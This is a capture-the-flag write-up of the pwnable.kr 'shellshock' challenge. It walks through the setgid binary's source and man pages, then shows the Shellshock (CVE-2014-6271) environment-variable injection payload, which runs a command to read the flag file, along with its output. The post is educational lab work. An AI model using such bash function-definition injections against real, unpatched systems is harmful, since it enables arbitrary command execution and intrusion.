Today I’m going to show you how to exploit a vulnerability in shellschock challenge from pwnable.kr.

Solution

Firstly we’ll have to connect via ssh to the server hosting this challenge.

main:~ > ssh [email protected] -p2222
[email protected] password:
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    /
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|

- Site admin : [email protected]
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Fri Jan 19 07:08:33 2018 from 46.164.98.87
[email protected]:~$ ls -la
total 980
drwxr-x---  5 root shellshock       4096 Oct 23  2016 .
drwxr-xr-x 87 root root             4096 Dec 27 23:17 ..
-r-xr-xr-x  1 root shellshock     959120 Oct 12  2014 bash
d---------  2 root root             4096 Oct 12  2014 .bash_history
-r--r-----  1 root shellshock_pwn     47 Oct 12  2014 flag
dr-xr-xr-x  2 root root             4096 Oct 12  2014 .irssi
drwxr-xr-x  2 root root             4096 Oct 23  2016 .pwntools-cache
-r-xr-sr-x  1 root shellshock_pwn   8547 Oct 12  2014 shellshock
-r--r--r--  1 root root              188 Oct 12  2014 shellshock.c

From now on, we’re ready to play with the challenge. First thing I notice is that flag is only accessible by user shellshock_pwn, other than my user called shellshock. But luckily, the binary is also using shellshock_pwn GID. Then, following my usual steps, I decide to check out the source code.

#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

In order to check what setresgid, setresuid and getegid are I decided to look at the man pages for these functions. Here’s the quick walkthrough.

setresuid() sets the real user ID, the effective user ID, and the
saved set-user-ID of the calling process.

An  unprivileged  process may change its real UID, effective UID,
and saved set-user-ID, each to one of: the current real UID,  the
current effective UID or the current saved set-user-ID.

A  privileged  process (on Linux, one having the CAP_SETUID capa‐
bility) may set its real UID, effective UID, and saved  set-user-
ID to arbitrary values.

If one of the arguments equals -1, the corresponding value is not
changed

Completely analogously, setresgid() sets the real GID,  effective
GID,  and  saved  set-group-ID of the calling process (and always
modifies the filesystem GID to be the same as the effective GID),
with the same restrictions for unprivileged processes.
The getegid() function shall return the effective group ID of the
calling process

In the other words, this program will run with the group ID of the owner, which is shellshock_pwn. Just as the ID of the flag. That’s good news.

Now let’s look at the challenge name once again. Shellshock is the name of the vulnerability disclosed on 24 September 2014. It allows an attacker to execute arbitrary commands on the vulnerable versions of bash.

Vulnerability can be tested with the following command.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

We can use the snippet to perform our own shellshock on this vulnerable binary. Firstly, let’s modify this command to view the flag for us.

export x="() { :;}; /bin/cat flag "

Export is only used to save the variable, and then run the binary - just like that.

[email protected]:~$ export x="() { :;}; /bin/cat flag "
[email protected]:~$ ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

Tools used

No external tools used.

Reference/notes

https://en.wikipedia.org/wiki/Shellshock_software_bug

https://www.owasp.org/images/1/1b/Shellshock_-_Tudor_Enache.pdf

http://seclists.org/oss-sec/2014/q3/650

https://blog.cloudflare.com/inside-shellshock/